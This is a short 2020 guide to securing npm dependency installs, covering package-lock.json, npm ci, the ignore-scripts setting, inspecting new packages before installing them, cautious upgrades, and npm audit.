N. P. O'Donnell, 2020
- NPM website: npmjs.org
The package-lock.json is generated during npm i and should be included in source control. Its purpose is to lock all direct and transitive dependencies at specific minor versions for deterministic builds.
Changing the version of a package in package.json such that it goes out of sync with package-lock.json will cause NPM to install the version from package.json, which can be a security concern. To prevent this, run npm ci instead of npm i. This will delete the node_modules folder, and install dependencies strictly from the package-lock.json only. The install will fail if any inconsistencies are detected between package-lock.json and package.json. Unlike npm i, npm ci will never modify package-lock.json.
When installling a package, always pass the --ignore-scripts option to prevent scripts from being run. To make this happen by deafult, update the NPM config:
npm config set ignore-scripts true
Manually inspect the package.json of any new or unknown package for anything odd before running any NPM commands. There are ways for attackers to have arbitrary scripts run from nothing but an NPM install. See this video.
When a new major version of a package is released, wait for it to be adopted by the community and for any early issues to be caught before upgrading to it. When updating minor versions for security/bug fixes, run npm updated to see which packages are out of date and update each package individually. Read release notes, and ensure you understand the implications of each update.
Use npm audit to scan for security vulnerabilities in your dependencies.